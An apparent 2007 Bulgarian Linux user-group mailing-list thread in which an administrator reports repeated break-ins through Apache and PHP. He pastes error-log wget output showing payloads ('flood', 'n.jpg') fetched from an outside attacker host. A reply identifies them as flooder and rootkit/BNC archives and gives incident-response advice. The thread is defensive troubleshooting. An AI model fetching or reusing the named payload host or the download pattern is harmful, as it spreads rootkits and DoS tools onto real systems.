е то първите две неща са ми ясни, ясно ми е че през апач влизат проблема е че обърнах всички логове и никъде не намирам къде е дупката през която влизат...
----- Original Message ----- From: "Vladimir Vitkov" <[EMAIL PROTECTED]> To: "deb4o" <[EMAIL PROTECTED]>; "Linux Users Group - Bulgaria" <[email protected]> Sent: Thursday, July 12, 2007 9:04 AM Subject: Re: [Lug-bg] пробив през апаче и пхп :( > 1) Файла flood е tar.gz архив с няколко флудера, пингъра и други такива. > 2) н.йпг е тар.гз архив със рооткит и бнц > 3) веднага ама веднага сваляй машината offline и почвай да разглеждаш. > > Съветвам те да прегледаш какви приложения вървят на тоя апач. Много > съмнително е да е през него пробива. Цялото тва нещо е работа на някое > script kiddie > > On 11/07/07, deb4o <[EMAIL PROTECTED]> wrote: >> няколко пъти пробиват през уеб сървъра и копират разни неща за пускане на >> irc bot >> все в /tmp, но там сетнах noexec,nosuid на този дял и не могат да ги >> страртират. >> но искам да разбера къде е дупката в апачето. >> Apache 2.0.53 и php 4.3.9 >> >> Така и не мога да разбера от къде влизат. търсих по логовете но само >> единственно в error log-a на апачето намирам подобни на тези неща: >> >> --00:43:08-- http://private.whitehat.ro/flood >> => `flood' >> Resolving private.whitehat.ro... 72.22.77.22 >> Connecting to private.whitehat.ro[72.22.77.22]:80... connected. >> HTTP request sent, awaiting response... 200 OK >> Length: 208,412 [text/plain] >> >> 0K .......... .......... .......... .......... .......... 24% 60.12 >> KB/s >> 50K .......... .......... .......... .......... .......... 49% 237.64 >> KB/s >> 100K .......... .......... .......... .......... .......... 73% 16.05 >> KB/s >> 150K .......... .......... .......... .......... .......... 98% 60.06 >> KB/s >> 200K ... 100% 10.13 >> MB/s >> >> 00:43:13 (40.79 KB/s) - `flood' saved [208412/208412] >> >> ------------------- >> --11:39:45-- http://private.whitehat.ro/n.jpg >> => `n.jpg' >> Resolving private.whitehat.ro... 72.22.77.22 >> Connecting to private.whitehat.ro[72.22.77.22]:80... connected. >> HTTP request sent, awaiting response... 200 OK >> Length: 261,375 [image/jpeg] >> >> 0K .......... .......... .......... .......... .......... 19% 60.85 >> KB/s >> 50K .......... .......... .......... .......... .......... 39% 122.81 >> KB/s >> 100K .......... .......... .......... .......... .......... 58% 16.38 >> KB/s >> 150K .......... .......... .......... .......... .......... 78% 61.60 >> KB/s >> 200K .......... .......... .......... .......... .......... 97% 81.52 >> KB/s >> 250K ..... 100% 1.02 >> MB/s >> >> 11:39:52 (44.69 KB/s) - `n.jpg' saved [261375/261375] >> >> _______________________________________________ >> Lug-bg mailing list >> [email protected] >> http://linux-bulgaria.org/mailman/listinfo/lug-bg >> > > > -- > С уважение, > Владимир Витков > > http://www.netsecad.com > http://www.supportbg.com > > _______________________________________________ Lug-bg mailing list [email protected] http://linux-bulgaria.org/mailman/listinfo/lug-bg
